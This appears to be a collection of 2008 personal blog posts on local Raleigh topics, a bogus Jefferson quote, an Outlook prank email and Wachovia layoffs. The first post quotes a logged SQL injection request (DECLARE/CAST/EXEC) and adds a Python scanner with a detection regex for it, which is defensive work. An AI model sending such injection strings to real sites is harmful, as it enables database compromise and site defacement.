Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] "GET /?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 42469 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"

Turns out it's a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or it's being carried out by two teenagers pretending to be a "gang"). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I've been blocking the IP when it comes up, but that becomes impractical after a while.
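Since the source IP and user agent change from hit to hit, a log scanner that matches on the shape of the injected SQL rather than on the address is a more durable way to spot these requests. The following is an added example, not code from the original post: it parses Apache combined-format lines, URL-decodes each request, and flags the DECLARE/CAST/EXEC chain. The sample log lines and the `0x41424344` hex blob are constructed stand-ins for the real payload.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shape of the logged attack: DECLARE a variable, CAST a hex blob into it, EXEC it.
# Matching the scaffolding (not the blob) catches the attack whatever the payload is.
INJECTION_RE = re.compile(
    r"DECLARE\s+@\w+.*?CAST\s*\(.*?\).*?EXEC\s*\(", re.IGNORECASE | re.DOTALL
)

# Constructed sample log (the hex blob 0x41424344 is a placeholder, not a real payload)
SAMPLE_LOG = [
    '163.19.104.88 - - [02/Oct/2008:05:57:15 -0400] "GET /?\';DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x41424344%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 42469 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"',
    '10.0.0.5 - - [02/Oct/2008:06:01:02 -0400] "GET /?p=12 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [02/Oct/2008:06:02:30 -0400] "GET /search?q=cast+of+the+show HTTP/1.1" '
    '200 900 "-" "Mozilla/5.0"',
]


def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_sql_injection(request):
    """URL-decode the request (twice, to unmask double-encoding) and test the signature."""
    decoded = unquote(unquote(request))
    return bool(INJECTION_RE.search(decoded))


def scan_log(lines):
    """Return one record per flagged request: who sent it, when, and with which agent."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec and is_sql_injection(rec["request"]):
            hits.append({"ip": rec["ip"], "time": rec["time"], "agent": rec["agent"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} flagged ({hit['agent']})")
```

Feeding the real access log through `scan_log` gives the list of offending IPs and user agents per day without having to read each line by hand.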

Tracing the bogus Thomas Jefferson bank quote

As mentioned in the previous post, a quote attributed to Thomas Jefferson is being bandied about now that the bank bailout is in the news. The quote is:

“I believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.” – Thomas Jefferson to Albert Gallatin, 1802

I thought the quote was fishy-sounding, so I did some Googling tonight to find where it came from. The first step was to search on a unique snippet of the quote. Out of 220 Google results on “continent their fathers conquered” I found a slew of results from this year (and especially last month), but many without listed dates. How far back could I trace it?

Bogus Thomas Jefferson quote

I found this quote supposedly by Thomas Jefferson floating around the Internet:

“I believe that banking institutions are more dangerous to our liberties than standing armies. If the American people ever allow private banks to control the issue of their currency, first by inflation, then by deflation, the banks and corporations that will grow up around [the banks] will deprive the people of all property until their children wake-up homeless on the continent their fathers conquered.” – Thomas Jefferson to Albert Gallatin, 1802

While a bit poetic, I think the quote is fabricated. The folks at Snopes think it's bogus. It also doesn't appear on UVa's Thomas Jefferson Quotation Page.

Just like the Einstein Bee quote, someone used Jefferson's stature to prop up their modern-day argument.

Highway horses

Watching a police officer ride on horseback through downtown this afternoon got me wondering: what are the laws about horses on public streets? Still legal? I imagine there was never a defined point where cars became kings of the road.

Any horse experts want to weigh in?

Outlook: snarky

When my officemate threw up his hands in frustration one time too many after Microsoft Outlook crashed, I felt the need to send a happygram to Bill Gates. Feeling prankish, I rattled off this email:

—–Original Message—–
From: Mark Turner [mailto:jmarkturner at blah blah blah . com]
Sent: Monday, September 29, 2008 00:23 AM
To: Bill Gates
Subject: Thanks!

Mr. Gates,

Thanks so much for creating Microsoft Outlook. My life is so much better because of it.

Best Regards,

Mark Turner
Raleigh, NC

I about fell out of my chair laughing when I got this response back from his administrative staff just now:

Raleigh’s rad new skatepark: Marsh Creek

I attended the groundbreaking ceremony at the Marsh Creek Skate Park this morning. It was my first ceremony as a Parks Board member. Board chair Eugene Weeks was the only other member present.

The park itself will be a jewel for the skateboarding kids of Raleigh. We’re not talking a few plywood half-pipes nailed together but an X-Games-worthy arena. What I didn’t see in the amazing renderings of the park is where the bleachers will be. I may be too old (and, uh, clumsy) to be catching air on a skateboard but I’d love to sit and watch!

To serve most of the kids who will use it, the park will need the CAT 15C bus route adjusted. It's just too far off the bus route as it stands. I attempted to ride the bus to the park this morning until GoTriangle.Org told me it would take an hour to get there. No thanks: I can walk faster. In fact, a half-mile walk was part of the route GoTriangle provided. Total buzz kill, dude.

Anyway, if gravity’s really holding you back then Marsh Creek will soon be your place.

Can’t get there from here

Looks like when the market tanked today it took The Google’s memory of my neighborhood with it. Typing my address into Google maps once showed me where I live. Not anymore. I’ve become a non-place.

I can understand how my neighborhood, being about two years old, might take a while to get into Google. It's kinda strange to have it in there and then have it dropped, however.

Why can’t Wake County’s Property Tax records work this way?

USS Elliot decommissioning video

I spent a moment last night watching the USS Elliot DD-967 Decommissioning Video that Ens. Jeff Underwood (now of MissionMediaUSA) was selling at the ceremony in December 2003. The video doesn't show the decommissioning but it does show some of the ship and interviews from the last crew. Jeff gave me permission to post a copy of it, so I put it here. It's an MPEG4 file shrunk to … um, 160 megabytes, so start the download and go take a nap while it completes. You'll probably only want to watch this if you served on the Elliot, truth be told.

I also went hunting and think I found a photograph from Elliot's last day. A midshipman there for summer training posted pictures from the SINKEX that day. I originally thought the ship in the middle of this picture might be Elliot under tow, but it's more likely another ship lining up to take a shot at Elliot.

The L word

Wachovia is being bought by CitiGroup. A CitiGroup spokeswoman declined to speak about layoffs, but the company “expects to realize more than $3 billion of annualized expense synergies through the consolidation of overlapping functions.”

Those of you who play Buzzword Bingo know that anywhere the word “synergies” appears it is never good news. And let’s consider “consolidation of overlapping functions.” Hmm. What could this describe … let me think … perhaps … um, layoffs!?!

I feel for my friends over at Wachovia. At the same time I know I would’ve left a long time ago: corporate doublespeak and I don’t get along.